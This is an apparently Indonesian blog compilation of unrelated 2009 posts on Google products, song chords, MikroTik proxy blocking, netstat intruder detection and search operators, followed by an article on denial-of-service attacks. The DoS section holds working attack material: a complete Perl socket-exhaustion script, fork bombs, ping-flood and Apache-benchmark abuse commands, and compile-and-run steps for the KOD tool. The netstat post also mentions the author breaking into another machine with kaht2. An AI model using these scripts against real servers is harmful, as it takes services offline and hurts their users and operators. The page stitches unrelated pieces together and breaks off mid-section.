Google dimulai sebagai sebuah proyek pencarian pada Januari 1996 oleh Larry Page dan Sergey Brin, dua mahasiswa Ph. D. di Universitas Stanford, California. Mereka menghipotesiskan bahwa sebuah mesin pencari yang menganalisa pereratan antara website dapat menghasilkan hasil yang lebih baik daripada teknik yang sudah ada, yang menilai hasil berdasarkan jumlah pencarian tersebut muncul pada sebuah halaman. Mesin pencari mereka disebut "BackRub" karena pranala kembali sistemnya dapat memperkirakan pentingya sebuah situs.

Sebuah mesin pencari kecil bernama Rankdex telah menggunakan strategi yang sama. Diyakini bahwa halaman dengan pranala lebih banyak dari halaman web yang relevan merupakan halaman paling relevan yang dikaitkan dengan pencarian, Page dan Brin menguji tesis mereka sebagai bagian dari pembelajaran mereka, dan mendirikan tumpuan untuk mesin pencari mereka.
Halaman utama Google menampilkan desain sederhana yang telah membantu mempopulerkannya.Mesin pencari Google menarik perhatian diantara jumlah pengguna Internet yang terus meningkat, yang menyukai desain simpelnya dan penggunaannya. Pada tahun 2000.

Nama "Google" berasal dari ucapan "googol" yang salah, yang merujuk pada 10100 (angka yang itunjukkan oleh 1 yang diikuti oleh seratus nol). Setelah kata ini menjadi ucapan sehari-hari, kata "google", dimasukkan dalam Merriam Webster Collegiate Dictionary dan Oxford English Dictionary pada 2006, yang berarti "menggunakan mesin pencari Google untuk memperoleh informasi di Internet."

1. pengertian
Sistem Operasi adalah penghubung antara lapisan hardware dan lapisan software. Jadi gOS adalah sistem operasi yang menghubungkan antara lapisan hardware dan lapisan software yang berbasis Ubuntu Linux 7.10 Gutsy Gibbon.Perbedaannya sama seperti Linux Mint, hanya pada pemaketan software - softwarenya.
Dibuat berdasarkan Ubuntu Linux 7.10 dengan tampilan Enlightenment E17, hampir seluruh kegiatan PC anda akan dikerjakan dengan aplikasi - aplikasi Google lewat Firefox; Mail, Calendar, News, Maps dan Documents & Spreadsheets. gOS juga datang dengan OpenOffice.org 2.2 dan beberapa aplikasi favorit Linux lainnya.
gOSMemang sistem operasi ini lebih diarahkan ke web application. Secara default sistem operasi ini menyertakan launcher ke web - web ternama (dan kebanyakan Google) : GMail, YouTube, Google, Google Docs, Orkut, Wikipedia, dll.
gOS merupakan OS modifikasi dari ubuntu. G dari gOS adalah green, namun banyak orang yang mengasosiasikan dengan Google. gOS ini memang dirancang untuk beberapa aplikasi online Google dan beberapa aplikasi Open Source lainnya.

2. Sistem Operasi secara umum terdiri dari beberapa bagian:
Mekanisme Boot, yaitu meletakkan kernel ke dalam memory Kernel, yaitu inti dari sebuah Sistem OperasiCommand Interpreter atau shell, yang bertugas membaca input dari pengguna
Pustaka-pustaka, yaitu yang menyediakan kumpulan fungsi dasar dan standar yang dapat dipanggil oleh aplikasi lain
Driver untuk berinteraksi dengan hardware eksternal, sekaligus untuk mengontrol mereka.
Sebagian Sistem Operasi hanya mengizinkan satu aplikasi saja yang berjalan pada satu waktu, tetapi sebagian besar Sistem Operasi baru mengizinkan beberapa aplikasi berjalan secara simultan pada waktu yang bersamaan. Sistem Operasi seperti itu disebut sebagai Multi-tasking Operating System. Beberapa Sistem Operasi berukuran sangat besar dan kompleks, serta inputnya tergantung kepada input pengguna, sedangkan Sistem Operasi lainnya sangat kecil dan dibuat dengan asumsi bekerja tanpa intervensi manusia sama sekali. Tipe yang pertama sering disebut sebagai Desktop OS, sedangkan tipe kedua adalah Real-Time OS inti umum

gOS :
gOS adalah operating system baru yang di develop good operating system (OS) company untuk Google company. tampilan nya mirip mac os, karna gOS ini di develop base kernel ubuntu dan dekstopnya menggunakan enlightenment. Operating gOS (Google O.S) ini memiliki features

Gmail :
Gmail adalah penyedia layanan surat elektronik (email) gratis milik Google yang diluncurkan pada tanggal 31 Maret 2004,pengguna diberi ruang di sini agar dapat menyimpan berkas-berkas tertentu baik yang berupa teks maupun lampiran. Hal yang menarik dari Gmail ini adalah kapasitas dari mail box yang selalu bertambah.
Dan sampai saat ini (Juni 2006) kapasitas total per account-nya hampir 3 GB (peluncuran pertama 'hanya' 1 GB). Gmail sampai saat ini masih dalam tahap beta. Tampilan inbox ("Surat Masuk") Gmail dalam bahasa Indonesia.
Gmail juga mengaplikasi teknologi pencarian Google yang memudahkan penggunanya mencari sesuatu dari email mereka. Gmail juga menampilkan iklan yang didasarkan dari email yang diterima pengguna. Iklan tersebut hanya diperlihatkan ke pengguna Gmail dan tidak dikirimkan ke alamat eksternal. Gmail dapat mengirimkan attachment (lampiran) sampai 10 MB per email.

Google Maps :
Google Maps adalah sebuah jasa peta globe virtual gratis dan online disediakan oleh Google, Ia menawarkan peta yang dapat diseret dan gambar satelit untuk seluruh dunia dan baru-baru ini, Bulan, dan juga menawarkan perencana rute dan pencari letak bisnis di U.S., Kanada, Jepang, Hong Kong, China, UK, Irlandia (hanya pusat kota) dan beberapa bagian Eropa. Google Maps masih berada dalam tahap beta.

Google Docs :
aplikasi pengolah kata dan spreadsheet mirip dengan Microsoft word dan excel. Bedanya dengan aplikasi office milik microsoft adalah aplikasi yang disediakan oleh google ini online dan tentu saja gratis. Google menyebut layanan ini sebagai Google docs.

Selasa, 30 Juni 2009

Kord + Lirik ( Roulette - Aku Jatuh Cinta )

Roulette - Aku Jatuh Cinta

E B
Awalnya ku tak mengerti apa yang sedang kurasakan

C#m G#m
Segalanya berubah dan rasa rindu itu pun ada

A G#m
Sejak kau hadir di setiap malam dan tidurku

F#m B
Aku tau sesuatu sedang terjadi padaku


E G#m
Sudah sekian lama kualami pedih putus cinta

C#m G#m
Dan mulai terbiasa hidup sendiri tanpa asmara

A G#m
Dan hadirmu membawa cinta sembuhkan lukaku

F#m B
Kau berbeda dari yang kukira


Reff:

E F#m
Aku jatuh cinta kepada dirinya

B E
Sunguh sungguh cinta oh apa adanya

C#m F#m
Tak pernah kuragu namun tetap slalu menunggu

A Am
Sungguh aku jatuh cinta kepadanya


E B
Coba coba dengarkan apa yang ingin aku katakan

C#m G#m
Yang slama ini sungguh telah lama terpendam

A G#m
Aku tak percaya membuatku tak berdaya

F#m B
Tuk ungkapkan apa yang kurasa


Reff:

E F#m
Aku jatuh cinta kepada dirinya

B E
Sunguh sungguh cinta oh apa adanya

C#m F#m
Tak pernah kuragu namun tetap slalu menunggu

A Am
Sungguh aku jatuh cinta kepadanya



F#m G#m
Kadang aku cemburu, kadang aku gelisah

A C#m
Seringnya ku tak tentu lalui hariku

F#m G#m
Tak dapat kupungkiri hatiku yang terdalam

A C D
Betapa aku jatuh cinta kepadanya

Sabtu, 27 Juni 2009

Blok Mikrotik

Blok Mac Adreess
iptables -I PREROUTING -t nat -j DROP -m mac --mac-source AA:BB:CC:DD:EE:FF -p tcp --dport 80
iptables -I PREROUTING -t nat -j DROP -m mac --mac-source AA:BB:CC:DD:EE:FF

First, Configure Proxy
/ip proxy
enabled: yes
src-address: 0.0.0.0
port: 8080
parent-proxy: 0.0.0.0:0
cache-drive: system
cache-administrator: "Adhie IT"
max-disk-cache-size: none
max-ram-cache-size: none
cache-only-on-disk: no
maximal-client-connections: 1000
maximal-server-connections: 1000
max-object-size: 512KiB
max-fresh-time: 3d

Now, Make it Transparent
/ip firewall nat
chain=dstnat protocol=tcp dst-port=80 action=redirect to-ports=8080
Make sure that your proxy is NOT a Open Proxy
/ip firewall filter
chain=input in-interface= src-address=0.0.0.0/0 protocol=tcp dst-port=8080 action=drop
Now for Blocking Websites
/ip proxy access
dst-host=www.vansol27.com action=deny

It will block website http://www.vansol27.com, We can always block the same for different networks by giving src-address. It will block for particular source address.
We can also stop downloading files like.mp3, .exe, .dat, .avi,…etc.
/ip proxy access
path=*.exe action=deny
path=*.mp3 action=deny
path=*.zip action=deny
path=*.rar action=deny.
Try with this also
/ip proxy access
dst-host=:mail action=deny

Mendeteksi Penyusup Jaringan Lewat DOS

Mungkin kita tidak sadar kalau kita main diwarnet bahwa ternyata ada yang sedang memantau kita baik itu adminya atau memang orang iseng yang mau mencuri informasi dari kita, maka dengan itu saya akan sedikit mencoba melihat atau mendetiksinya hanya denga dos command!

Ternyata di Dos ada fasiltas yang mungkin kita semua lupakan dan jarang digunakan perintah itu adalah NETSTAT. Windows menyediakan perintah ini untuk mendukung jaringan. Netstat juga bisa digunakan untuk melihat ip-ip yang sedang terhubung ke komputer kita.

Untuk itu buka dos command kamu , tau kan caranya :d kalau ga tau nich :
- Start>Run>command.exe [utk win 95/98]
- Start>Run>cmd.exe [utk win 2000/xp /nt]
lalu mucul deh command prompt

C:\winnt>netstat ?

Displays protocol statistics and current TCP/IP network connections.

NETSTAT [-a] [-e] [-n] [-s] [-p proto] [-r] [interval]

-a Displays all connections and listening ports.
-e Displays Ethernet statistics. This may be combined with the
-s option.
-n Displays addresses and port numbers in numerical form.
-p proto Shows connections for the protocol specified by proto; proto may be TCP or UDP. If used with the -s option to display per-protocol statistics, proto may be TCP, UDP, or IP.
-r Displays the routing table.
-s Displays per-protocol statistics. By default, statistics are shown for TCP, UDP and IP; the -p option may be used to specify a subset of the default. interval dedisplays selected statistics, pausing interval seconds between each display. Press CTRL+C to stop redisplaying statistics. If omitted, netstat will print the current configuration information once.

Sekarang kita gunakan netstat untuk melihat koneksi yang sedang terhubung gunakan -a

C:\winnt>netstat -a
Proto Local Address Foreign Address State
TCP me:http me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:epmap me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:https me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:microsoft-ds me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1025 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1027 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1028 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1071 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1146 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1163 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1253 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1261 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1288 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1306 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1314 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:5101 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:epmap 10.22.1.236:4504 TIME_WAIT
TCP me:netbios-ssn me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1071 LAJKTTS02:1080 ESTABLISHED
TCP me:1288 IS~HRS:microsoft-ds ESTABLISHED
TCP me:1306 GREENGUY:microsoft-ds ESTABLISHED
UDP me:1134 *.*

sebelah nama pc itu adalah port yang digunakan untuk hubungan. netstat diatas saya mengunakan komputer kantor yang mengunakan ip dhcp. Disini kita bisa melihat siapa-siapa aja yang terhubung dalam komputer kita atau dengan contoh yang lebih jelas ini .
Untuk lebih jelasnya aku akan coba menyusup ke komputer orang lain dengan mengunakan kaht2 :D dan aku udah dapat menyusup.

C:\WINDOWS\System32>netstat -a
Active Connections

Proto Local Address Foreign Address State
TCP khs_2003:epmap khs_2003:0 LISTENING
TCP khs_2003:microsoft-ds khs_2003:0 LISTENING
TCP khs_2003:1025 khs_2003:0 LISTENING
TCP khs_2003:1063 khs_2003:0 LISTENING
TCP khs_2003:1093 khs_2003:0 LISTENING
TCP khs_2003:1136 khs_2003:0 LISTENING
TCP khs_2003:1138 khs_2003:0 LISTENING
TCP khs_2003:5000 khs_2003:0 LISTENING
TCP khs_2003:43715 khs_2003:0 LISTENING
TCP khs_2003:epmap 10.21.3.17:3628 TIME_WAIT <------1
TCP khs_2003:epmap 10.21.3.50:1686 FIN_WAIT_2 <------2
TCP khs_2003:netbios-ssn khs_2003:0 LISTENING
TCP khs_2003:1093 10.21.1.18:8080 CLOSE_WAIT
TCP khs_2003:1136 10.21.1.18:8080 ESTABLISHED
TCP khs_2003:1138 10.21.1.18:8080 ESTABLISHED
TCP khs_2003:11196 khs_2003:0 LISTENING
TCP khs_2003:43715 10.21.3.50:1687 ESTABLISHED <------3
UDP khs_2003:microsoft-ds *:*
UDP khs_2003:isakmp *:*
UDP khs_2003:1028 *:*
UDP khs_2003:1035 *:*
UDP khs_2003:ntp *:*
UDP khs_2003:netbios-ns *:*
UDP khs_2003:netbios-dgm *:*
UDP khs_2003:1900 *:*
UDP khs_2003:13715 *:*
UDP khs_2003:61804 *:*
UDP khs_2003:ntp *:*
UDP khs_2003:1032 *:*
UDP khs_2003:1036 *:*
UDP khs_2003:1107 *:*
UDP khs_2003:1134 *:*
UDP khs_2003:1900 *:*

Komputer ini sedang di susupi oleh aku coba lihat port nya.pada angka 3 ada port yang dibuka kaht2 untuk mengeksploit suatu komputer. lalu bagaimana kita cara kita untuk mengetahui nama komputer yang sedang menyusup ke komputer kita . Gunakan nbtstat -a

C:\WINDOWS\System32>nbtstat -a [ip]
C:\WINDOWS\Syetem32>nbtstat -a 10.21.3.50

Jantung:
Node IpAddress: [10.21.3.50] Scope Id: []

NetBIOS Remote Machine Name Table

Name Type Status
---------------------------------------------
ME <00> UNIQUE Registered
ME <20> UNIQUE Registered
WORKGROUP <00> GROUP Registered
WORKGROUP <1E> GROUP Registered
ME <03> UNIQUE Registered
INet~Services <1C> GROUP Registered
IS~ME..........<00> UNIQUE Registered
MAC Address = 00-60-08-29-37-48

Coba lihat ternyata ip 10.21.3.50 nama pc nya adalah me dan dia join ke workgroup. Kita bisa buat kaget orang yang mengintip kita itu gunakan netsend fasiltas yang hanya ada pada win 2000/xp atau nt .

C:\winnt>net send [ip/nama pc] [pesan]

Sebetulnya masih ada lagi fasilitas2 dos yang bisa digunakan untuk iseng :D jadi tambah ngerti dan asyik bukan main-main di DOS command, apalagi kalau main di warnet :d, ya udah segitu aja tricknya semoga bermaanfaat.

Status State
++ ESTABLISHED berarti komputer terhubung ke Foreign .
++ LISTENING koneksi komputer dalam keadaan standby .
++ TIME_WAIT komputer sedang menunggu suatu koneksi .
++ CLOSE_WAIT
++ FIND_WAIT

*ezine

Jumat, 26 Juni 2009

Tekhnik Pencarian Informasi di Internet Menggunakan Search Engine

Mungkin seluruh atau sebagian dari kita selalu tergantung dengan search engine
untuk mendapatkan informasi, berita, software gratis dan lain sebagainya. Tapi
masih sangat sedikit yang mengerti searching yang baik. Ok kita mulai saja,
bahwa dalam searching kita mengenal beberapa search engine salah satunya Google.
Beberapa search engine mengenal karakter seperti +, - dan ". Tetapi masih banyak
yang belum tahu mengenai karakter tersebut. Saya akan menggunakan mode Tanya
jawab dalam menjelaskan hal tersebut.



Karakter Matematika.

# Tanda (+)

Ingin mencari artikel yang didalamnya terkandung kata hacking,security dan internet.

Anda dapat mengetikkan kata disearch engine : +hacking +security +internet Jika
terdapat artikel yang memuat salah satu atau dua kata tersebut diatas tidak akan
ditampilkan hanya artikel yang memuat tiga kata tersebut yang di tampilkan .
Tanda + dibaca oleh search engine sebagai DAN symbol ini dapat dipakai
sebanyak-banyaknya misalnya: +harga +komputer murah +untuk +wilayah +medan.
Dan sebagai nya.



# Tanda (-)

Ingin mencari artikel yang didalamnya terkiandung kata statistic penduduk sumatera
kecuali Medan.Ketik di search engine : +statistic +penduduk +sumatera -Medan. Search
engine yang bersangkutan akan mencari di internet artikel yan mengandung kata Statistik
penduduk sumatera tetapi tidak terdapat kata medan. Atau seperti ini +tempat +wisata
+bali -kuta. Maka search engine akan menampilkan artikel tentang tempat wisata di bali
dan pada artikel tersebut tidak terdapat kata kuta. Tanda - dibaca oleh search engine
sebagai KECUALI.



# Tanda (")

Ingin mencari artikel di internet yang didalamnya terdapat kata hacking dan security dan
kata tersebut tidak duipisah kan oleh kata-kata yang lain.

Ketik di search engine : "hacking dan security" maka search engine yang bersangkuta akan
mencari kata hacking dan security yang katanya tidak dipisah kan oleh kata-kata lain.
Apabila ada artikel yang mengandung kata hacking dan security yang katanya dipisah kan
oleh kata-kata lain maka artikel tersebut tidak ditampilkan oleh search engine yang
bersangkutan.



Dan anda dapat juga menggabungkan ketiga karakter tersebut tersebut seperti contoh
berikut ini: +kuliah +"ilmu komputer" -bayar

Search engine akan mencari artikel di internet yang terdapat kata kuliah ilmu komputer
kata ilmu komputer tidak akan dipisah kan oleh kata lain dan tidak akan menampilkan
artikel tersebut bila terdapat kata bayar. Perlu di ingat bahwa penggunaan spasi untuk
memisah kan antara kata-kata yang kita cari, spasi tersebut akaan dibaca ATAU contoh
Ketik di search engine : ilmu komputer

Maka search engine akan menampilkan web yang mengandung kata ilmu atau komputer atau
yang mengandung kata kedua-dua nya.



Simbol Bolean

Seperti yang kita ketahui symbol bolean adalah kata-kata OR, AND dan NOT. Kita dapat
menggunakan symbol tersebut dalam mencari informasi di internet.

# Bolean OR

Pada dasar nya symbol bolean OR sama seperti apabila kita menggunakan spasi contoh :
ilmu OR komputer

Search engine akan menampilkan web yang mengandung kata ilmu atau kata komputer atau
kedua-duanya.

# Bolean AND

Penggunaan bolean AND sama dengan karakter/tanda + Contioh : ilmu AND komputer

Search engine akan menampilkan web yang mengandung kata ilmu komputer apabila tidak
terdapat salah satu dari kata tersebut tidak akan di tampilkan.

# Bolean NOT

Penggunaan bolean NOT sama dengan tanda (- ) contoh saya akan mencari infor- masi tentang
statistic penduduk di sumater tetapi tidak termasuk medan.

Ketik di sdearch engine : Statistik AND penduduk AND sumater NOT medan search engine akan
menampilkan web yang berisi kata statistic penduduk sumatera tetapi tidak terdapat
kata medan.

# Bolean NEAR

Contoh : saya ingin mencari kata ilmu komputyeryang jarak antara kata tersebut berdekatan.

Ketik di search engine : ilmu NEAR komputer maka search engine akan menampilkan web yang
berisi kata ilmu komputer yang jarak antara kedua kata tersebut berdekatan.

Penggunaan Bolean tersebut diatas dapat juga digabungkan contoh Saya ingin mencari definisi
dari kata cinta atau kasih maka dapat di ketik di search engine : definisi AND (cinta OR kasih)
Search engine akan menampilkan web yang mengandung kata defini cinta atau definisi kasih.
Untuk contoh selanjut nya anda coba sendiri.



Penggunaan Host.
Pencarian informasi dapat juga dengan menggunakan kata Host, Contoh:
# Saya ingin mencari website ilmu komputer.com maka saya dapat mengetikkan di search engine
host: ilmukomputer.com
# Saya ingin mencari kata php di website ilmukomputer.com maka saya dapat mengetikkan
kata : php host: ilmukomputer.comatau host: ilmukomputer.com php.
# Saya ingin mencari kata pertahanan di situs-situs pemerintahan indonesiamaka saya dapat
mengitikkan di search engine: pertahanan host: go.id.

Symbol/karakter matematika dapat juga digabungkan dalam pencarian ini contoh:

Saya akan mencari kata pesawat tetapi bukan yang terdapat didalam website menristek.go.id
maka saya dapat mengetikkan di search engine : pesawat -host: menristek.go.id.

# Mencari informasi berdasarkan type file
Ada sebagian orang mencari informasi berdasrkan type file.
Contoh:

Saya ingin mencari artikel tentang hacking dan security dan artilkel tersebut harus dalam
format pdf. Dan saya dapat mengetikkan di search engine :
+hacking +security filetype: pdf

dan search engine akan menampilkan artikel tentang hacking dan security dengan format pdf

contoh lain :
saya ingin mencari artikel tentang ilmu komputer didalam website yang sufiksnya ac.id
artikel tersebut harus file bertype pdf maka saya dapat mengetikkan di search engine

+ilmu +komputer filetype:pdf host ac.id

# Mencari informasi berdasarkan judul situs

Kita juga dapat mencari situs web berdasarkan judulnya .

Contoh :

Ketik di search engine title:komputer

Maka search engine akan menampilkan situs yang mengandung judul komputer. sedangkan pada
search engine yahoo tidak mengenal kata TITLE tetapi hanya disingkat T.

# Mencari informasi berdasarkan URL

Pencarian dengan cara ini akan menampilkan URL yang diminta

Contoh :

inurl:komputer

Maka semua search akan menampilkan semua URL yang ada kata komputernya seperti

www.ilmukomputer.com/komputer dsb.

Contoh lainnya :

Php inurl:ilmukomputer.com maka search engine akan menampilkan seluruh artikel yang
mengandung kata php pada subdomain ilmu komputer.Dan pada google juga mengenal kata
allinurl tetapi pencarian ini hanya terbatas pada subdirectory, Sedangkan sampai ke
level file atau dengan kata lain inurl lebih dalam pencariannya tidah hanya terbatas
pada subdirectory.Dan yang perlu di ingat Tidak semua search engine mengenal
karakter matematika dan Bolean.

*ezine

Serangan Denial Of Service

.o0 Kata Pengantar

Pada dasarnya saya mencoba memberikan gambaran umum tentang Denial of
Service atau yang lebih kita kenal dengan DoS. Beberapa pertanyaan
yang mungkin bisa terjawab diantaranya :

1. Apa itu DoS ?
2. Apa motif cracker untuk melakukan itu ?
3. Bagaimana cara melakukannya ?
4. Apa yang harus saya lakukan untuk mencegahnya ?

Semuanya untuk anda, ENJOY !!.

.o0 Apa itu Denial of Service (DoS) ?

Denial of Service adalah aktifitas menghambat kerja sebuah layanan (servis)
atau mematikan-nya, sehingga user yang berhak/berkepentingan tidak dapat
menggunakan layanan tersebut. Dampak akhir dari aktifitas ini menjurus
kepada tehambatnya aktifitas korban yang dapat berakibat sangat fatal
(dalam kasus tertentu). Pada dasarnya Denial of Service merupakan serangan
yang sulit diatasi, hal ini disebabkan oleh resiko layanan publik dimana
admin akan berada pada kondisi yang membingungkan antara layanan dan
kenyamanan terhadap keamanan. Seperti yang kita tahu, keyamanan berbanding
terbalik dengan keamanan. Maka resiko yang mungkin timbul selalu mengikuti
hukum ini.

Beberapa aktifitas DoS adalah:

1. Aktifitas 'flooding' terhadap suatu server.
2. Memutuskan koneksi antara 2 mesin.
3. Mencegah korban untuk dapat menggunakan layanan.
4. Merusak sistem agar korban tidak dapat menggunakan layanan.


.o0 Motif penyerang melakukan Denial of Service

Menurut Hans Husman (t95hhu@student.tdb.uu.se), ada beberapa motif cracker
dalam melakukan Denial of Service yaitu:

1. Status Sub-Kultural.
2. Untuk mendapatkan akses.
3. Balas dendam.
4. Alasan politik.
5. Alasan ekonomi.
6. Tujuan kejahatan/keisengan.

Status subkultural dalam dunia hacker, adalah sebuah unjuk gigi atau lebih
tepat kita sebut sebagai pencarian jati diri. Adalah sebuah aktifitas umum
dikalangan hacker-hacker muda untuk menjukkan kemampuannya dan Denial of
Service merupakan aktifitas hacker diawal karirnya. Alasan politik dan
ekonomi untuk saat sekarang juga merupakan alasan yang paling relevan. Kita
bisa melihat dalam 'perang cyber' (cyber war), serangan DoS bahkan dilakukan
secara terdistribusi atau lebih dikenal dengan istilah 'distribute Denial of
Service'. Beberapa kasus serangan virus semacam 'code-red' melakukan serangan
DoS bahkan secara otomatis dengan memanfaatkan komputer yang terinfeksi,
komputer ini disebut 'zombie' dalam jargon.Lebih relevan lagi, keisengan
merupakan motif yang paling sering dijumpai. Bukanlah hal sulit untuk
mendapatkan program-program DoS, seperti nestea, teardrop, land, boink,
jolt dan vadim. Program-program DoS dapat melakukan serangan Denial of
Service dengan sangat tepat, dan yang terpenting sangat mudah untuk
melakukannya. Cracker cukup mengetikkan satu baris perintah pada Linux Shell
yang berupa ./nama_program argv argc ...


.o0 Denial of Sevice, serangan yang menghabiskan resource.

Pada dasarnya, untuk melumpuhkan sebuah layanan dibutuhkan pemakaian resource
yang besar, sehingga komputer/mesin yang diserang kehabisan resource dan
manjadi hang. Beberapa jenis resource yang dihabiskan diantaranya:

A. Swap Space
B. Bandwidth
C. Kernel Tables
D. RAM
E. Disk
F. Caches
G. INETD

A. Swap Space

Hampir semua sistem menggunakan ratusan MBs spasi swap untuk melayani permintaan
client. Spasi swap juga digunakan untuk mem-'forked' child process. Bagaimanapun
spasi swap selalu berubah dan digunakan dengan sangat berat. Beberapa serangan
Denial of Service mencoba untuk memenuhi (mengisi) spasi swap ini.

B. Bandwidth

Beberapa serangan Denial of Service menghabiskan bandwidth.

C. Kernel Tables

Serangan pada kernel tables, bisa berakibat sangat buruk pada sistem. Alokasi
memori kepada kernel juga merupakan target serangan yang sensitif. Kernel
memiliki kernelmap limit, jika sistem mencapai posisi ini, maka sistem tidak
bisa lagi mengalokasikan memory untuk kernel dan sistem harus di re-boot.

D. RAM

Serangan Denial of Service banyak menghabiskan RAM sehingga sistem mau-tidak
mau harus di re-boot.

E. Disk

Serangan klasik banyak dilakukan dengan memenuhi Disk.

F. Caches

G. INETD

Sekali saja INETD crash, semua service (layanan) yang melalui INETD tidak akan
bekerja.


.o0 Teknik Melakukan Denial of Service

Melakukan DoS sebenarnya bukanlah hal yang sulit dilakukan. Berhubung DoS merupakan
dampak buruk terhadap sebuah layanan publik, cara paling ampuh untuk menghentikannya
adalah menutup layanan tersebut. Namun tentu saja hal ini tidak mengasikkan dan juga
tidak begitu menarik.
Kita akan bahas tipe-tipe serangan DoS.

1. SYN-Flooding
SYN-Flooding merupakan network Denial ofService yang memanfaatkan 'loophole'
pada saat koneksi TCP/IP terbentuk. Kernel Linux terbaru (2.0.30 dan yang
lebih baru) telah mempunyai option konfigurasi untuk mencegah Denial of
Service dengan mencegahmenolak cracker untuk mengakses sistem.
2. Pentium 'FOOF' Bug
Merupakan serangan Denial of Service terhadap prosessor Pentium yang
menyebabkan sistem menjadi reboot. Hal ini tidak bergantung terhadap jenis
sistem operasi yang digunakan tetapi lebih spesifik lagi terhadap prosessor
yang digunakan yaitu pentium.
3. Ping Flooding
Ping Flooding adalah brute force Denial of Service sederhana. Jika serangan
dilakukan oleh penyerang dengan bandwidth yang lebih baik dari korban, maka
mesin korban tidak dapat mengirimkan paket data ke dalam jaringan (network).
Hal ini terjadi karena mesin korban di banjiri (flood) oleh peket-paket ICMP.
Varian dari serangan ini disebut "smurfing"
(http://www.quadrunner.com/~chuegen/smurf.txt).

Serangan menggunakan exploits.

Beberapa hal yang harus dipahami sebelum melakukan serangan ini adalah:
A. Serangan membutuhkan Shell Linux (Unix/Comp)
B. Mendapatkan exploits di: http://packetstormsecurity.nl (gunakan
fungsi search agar lebih mudah)
C. Menggunakan/membutuhkan GCC (Gnu C Compiler)

1. KOD (Kiss of Death)
Merupakan tool Denial of Service yang dapat dugunakan untuk menyerang Ms.
Windows pada port 139 (port netbios-ssn). Fungsi utama dari tool ini adalah
membuat hang/blue screen of death pada komputer korban.
Cara penggunaan:
A. Dapatkan file kod.c
B. Compile dengan Gcc: $ gcc -o kod kod.c
C. Gunakan: $ kod [ip_korban] -p [port] -t [hits]
Kelemahan dari tool ini adalah tidak semua serangan berhasil, bergantung
kepada jenis sistem operasi dan konfigurasi server target (misalmya:
blocking)
2. BONK/BOINK
Bong adalah dasar dari teardrop (teardrop.c). Boink merupakan Improve dari
bonk.c yang dapat membuat crash mesin MS. Windows 9x dan NT
3. Jolt
Jolt sangat ampuh sekali untuk membekukan Windows 9x dan NT. Cara kerja Jolt
yaitu mengirimkan serangkaian series of spoofed dan fragmented ICMP Packet
yang tinggi sekali kepada korban.
4. NesTea
Tool ini dapat membekukan Linux dengan Versi kernel 2.0. kebawah dan Windows
versi awal. Versi improve dari NesTea dikenal dengan NesTea2
5. NewTear
Merupakan varian dari teardrop (teardrop.c) namun berbeda dengan bonk
(bonk.c)
6. Syndrop
Merupakan 'serangan gabungan' dari TearDrop dan TCP SYN Flooding. Target
serangan adalah Linux dan Windows
7. TearDrop
TearDrop mengirimkan paket Fragmented IP ke komputer (Windows) yang terhubung
ke jaringan (network). Serangan ini memanfaatkan overlapping ip fragment, bug
yang terdapat pada Windowx 9x dan NT. Dampak yang timbul dari serangan ini
adalah Blue Screen of Death

Serangan langsung (+ 31337)

1. Ping Flood
Membutuhkan akses root untuk melakukan ini pada sistem Linux. Implementasinya
sederhana saja, yaitu dengan mengirimkan paket data secara besar-besaran.
bash # ping -fs 65000 [ip_target]
2. Apache Benchmark
Program-program Benchmark WWW, digunakan untuk mengukur kinerja (kekuatan)
suatu web server, namun tidak tertutup kemungkinan untuk melakukan
penyalahgunaan.
bash $ /usr/sbin/ab -n 10000 -c 300 \
http://korban.com/cgi-bin/search.cgi?q=kata+yang+cukup+umum
(diketik dalam 1 baris!)
Akan melakukan 10000 request paralel 300 kepada host korban.com
3. Menggantung Socket
Apache memiliki kapasitas jumlah koneksi yang kecil. Konfigurasi universal
oleh Apache Software Foundation adalah MaxClients 150, yang berarti hanyak
koneksi yang diperbolehkan mengakses Apache dibatasi sebanyak 150 clients.
Jumlah ini sedikit banyak dapat berkurang mengingat browser lebih dari 1
request simultan dengan koneksi terpisah-pisah.

Penyerang hanya melakukan koneksi lalu diam, pada saat itu apache akan
menunggu selama waktu yang ditetukan direktif TimeOut (default 5 menit).
Dengan mengirimkan request simultan yang cukup banyak penyerang akan memaksa
batasan maksimal MaxClients. Dampak yang terjadi, clien yang mengakses apache
akan tertunda dan apa bila backlog TCP terlampaui maka terjadi penolakan,
seolah-olah server korban tewas.

Script gs.pl (gantung socket)

#!/usr/bin/perl
#
# Nama Script : gs.pl
# Tipe : Denial of Service (DoS)
# Auth : MOBY || eCHo --> moby@echo.or.id || mobygeek@telkom.net
# URL : www.echo.or.id
#
use IO::Socket;
if (!$ARGV[1]) {
print "Gunakan: perl gs.pl [host] [port] \n";
exit;
}
for (1..1300) {
$fh{$_}=new IO::Socket::INET
PeerAddr=> "$ARGV[0]",
PeerPort=> "$ARGV[1]",
Proto => "tcp"
or die; print "$_\n"
}
# END. 27 Oktober 2003
# Lakukan dari beberapa LoginShell (komputer) !

DoS-ing Apache lagi !!

Beberapa contoh skrip perl untuk melakukan DoS-ing secara local.

1. Fork Bomb, habiskan RAM

#!/usr/bin/perl
fork while 1;

2. Habiskan CPU

#!/usr/bin/perl
for (1..100) { fork or last }
1 while ++$i

3. Habiskan Memory

#!/usr/bin/perl
for (1..20) { fork or last }
while(++$i) { fh{$i} = "X" x 0xff; }

4. Serangan Input Flooding
Saya mengamati serangan ini dari beberapa advisories di BugTraq. Remote
Buffer Overflow yang menghasilkan segmentation fault (seg_fault) dapat
terjadi secara remote jika demon (server) tidak melakukan verifikasi input
sehingga input membanjiri buffer dan menyebabkan program dihentikan secara
paksa.

Beberapa 'proof of concept' dapat dipelajari melalui beberapa contoh ini.

1. Serangan kepada IISPop EMAIL Server.
